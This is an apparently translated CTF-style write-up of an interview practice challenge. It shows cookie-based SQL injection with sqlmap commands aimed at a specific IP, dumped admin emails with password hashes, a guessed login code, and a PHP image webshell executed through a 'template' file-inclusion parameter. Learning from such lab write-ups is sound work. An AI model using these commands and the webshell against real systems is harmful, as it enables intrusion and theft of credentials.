Friend interview, sent a practical question, found the same question on the public network, record it here.
Open the question link as follows:
Click on the about page for some hints.
It says that directory scanning is required, and dirsearch is used for directory scanning, and some files are discovered.
Access robots.txt to see if there is any sensitive information.
It hints at /1234, but accessing it shows 404.
This website has changed robots.txt, and through the robots.txt file of the friend's interview target machine, it is known that the content is Company_admin/login.php, which is the backend of this website.
The backend requires email, password, and a four-digit authentication code. Through simple brute-forcing, it is discovered that the captcha on this page changes every time it is refreshed, so the method of form brute-forcing is not feasible.
In the about.php page of the interview target machine, there is also a hint of sqli, SQL injection, and obviously there is a SQL injection vulnerability on the page.
Click on the blog on the homepage and find that there is a parameter for id, try if there is SQL injection.
Here is a hint, "about my password".
Directly use sqlmap for injection exploitation, and find that direct exploitation cannot retrieve content.
Through testing, it is found that the injection point exists in the cookie.
3 and 4.
Run directly with sqlmap.
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog --tables
There are five tables.
Read table content:
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog -T admin –columns
When sqlmap runs the fields of amdin, it keeps reporting errors, so manual injection is used here.
Obtain five accounts:
2020-08-08 20:16:55:fakeaddr@gmail.com:e69dc2c09e8da6259422d987ccbe95b5
2021-10-19 01:44:56:123@qq.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 02:53:01:qwe@gmail.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 23:41:40:qian@gmail.com:e10adc3949ba59abbe56e057f20f883e
The plaintext of [email protected] is asdqwe123.
Now only the four-digit authentication code is left. Since brute-forcing is not possible, there is a hint on the about page, which mentions "some social engineering".
In the blog section of the interview target machine, there are two articles, one of which is about wishing oneself a happy birthday, with a birthday date, 2019-10-27.
Try entering it, and login successfully with 1027.
The interface after logging in is as follows:
In the Blog-create post section, there is an upload point, and after testing, it is found that this place has a whitelist, which restricts only uploading image format extensions.
See if there is a file inclusion vulnerability, directly include a webshell in the image, and then execute commands.
In the access-language section, there is a parameter that is very familiar, "?template=".
Direct file inclusion is possible, so prepare an image shell.
Create a PHP file and a PNG file.
cat 1.php >> 1.png
After testing, it is found that the webshell uploaded by this target machine cannot be connected through GET or POST requests. It can only be connected through the cookie parameter, just like SQL injection, and then execute commands.
First, prepare the following webshell file.
<?php system($_COOKIE['a']);?>
Then make an image shell using the method above, and the generated image is as shown in the figure below.
Go back to the place where you create a blog and upload the image shell.
The address is upload/0c3459ff68c1495cefc557f0084a2ac6.png.
File inclusion: http://47.114.90.165:21001/Company_admin/language.php?template=../../upload/0c3459ff68c1495cefc557f0084a2ac6.png.
Capture this packet with Burp, and then execute commands in the cookie section.
Start looking for the flag.
Successfully found the flag.